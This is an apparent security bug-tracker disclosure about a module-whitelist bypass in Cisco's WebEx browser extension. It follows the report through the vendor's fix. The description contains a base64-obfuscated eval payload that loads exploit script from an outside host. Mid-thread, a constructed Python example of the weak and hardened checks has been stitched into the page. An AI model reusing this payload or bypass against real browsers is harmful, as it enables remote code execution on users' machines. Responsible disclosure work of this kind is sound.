
Issue metadata

Status: Fixed
Closed: Jan 2017

Blocked on:
issue 1324

issue 1096


Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass

Project Member Reported by, Jan 25 2017

Issue description

In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing issue 1096.

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *, but they're unfortunately not difficult to find.

Here is a working example:");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script:

Please note, that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: Windows 10-2017-01-24-19-23-30.png (822 KB)
Project Member

Comment 1 by, Jan 25 2017

Project Member

Comment 2 by, Jan 25 2017

Project Member

Comment 3 by, Jan 25 2017

I made some minor changes to the exploit script.
Attachment: updated exploit script (7.1 KB)
Project Member

Comment 4 by, Jan 26 2017


Hi Tavis,
We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.


Project Member

Comment 5 by, Jan 26 2017

Labels: -Restrict-View-Commit
Status: Fixed
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco, I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).
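The two checks discussed in this thread, the name-only whitelist of 1.0.5 that the report bypasses by overwriting a whitelisted module with a different Cisco-signed file, and the 1.0.7-style hardening that also constrains GpcInitCall/GpcExitCall, modelled as an added example. This is constructed illustration code, not Cisco's or the reporter's; the module names, the pinned-hash manifest and the identifier regex are assumptions (the real 1.0.7 regex is not given on the page).

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed stand-ins: one allowlisted component name and a manifest pinning
# the exact bytes expected for it (a hash manifest is an assumed hardening).
COMPONENT_ALLOWLIST = {"allowed_component.dll"}
GENUINE_BYTES = b"GENUINE COMPONENT BYTES (constructed)"
PINNED_SHA256 = {"allowed_component.dll": hashlib.sha256(GENUINE_BYTES).hexdigest()}
# Assumed shape of a function-name pattern; plain identifiers only.
FUNC_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def install_name_only(unpack_dir: Path, component: str, payload: bytes) -> bool:
    """1.0.5-style check: trusts the name, then overwrites the allowlisted
    file with whatever the install routine fetched. A signed but different
    module passes, which is the weakness the report describes."""
    if component not in COMPONENT_ALLOWLIST:
        return False
    (unpack_dir / component).write_bytes(payload)
    return True


def install_pinned(unpack_dir: Path, component: str, payload: bytes,
                   init_call: str, exit_call: str) -> bool:
    """Hardened check: allowlisted name AND pinned content hash AND
    init/exit entry points restricted to plain identifiers."""
    if component not in COMPONENT_ALLOWLIST:
        return False
    if hashlib.sha256(payload).hexdigest() != PINNED_SHA256[component]:
        return False  # signed-but-substituted module is rejected here
    if not (FUNC_NAME_RE.match(init_call) and FUNC_NAME_RE.match(exit_call)):
        return False  # entry point names must be bare identifiers
    (unpack_dir / component).write_bytes(payload)
    return True


def demo() -> dict:
    """Runs both loaders against the genuine module and a substituted one."""
    substituted = b"SOME OTHER TRUSTED-SIGNED MODULE (constructed)"
    name = "allowed_component.dll"
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        return {
            "name_only_genuine": install_name_only(root, name, GENUINE_BYTES),
            "name_only_substituted": install_name_only(root, name, substituted),
            "pinned_genuine": install_pinned(root, name, GENUINE_BYTES, "Init", "Exit"),
            "pinned_substituted": install_pinned(root, name, substituted, "Init", "Exit"),
            "pinned_bad_init": install_pinned(root, name, GENUINE_BYTES, "Init(); x", "Exit"),
        }
```

The name-only loader accepts the substituted module because the name matches; the pinned loader rejects both the substituted bytes and a non-identifier init call.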
Project Member

Comment 6 by, Jan 26 2017

Cisco's advisory is here

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member

Comment 7 by, Feb 3 2017

Labels: -Reported-2017-01-24 Reported-2017-Jan-24

Comment 8 Deleted

Comment 9 Deleted

Comment 10 Deleted

Project Member

Comment 11 by, Jul 6 2017

Blockedon: 1324
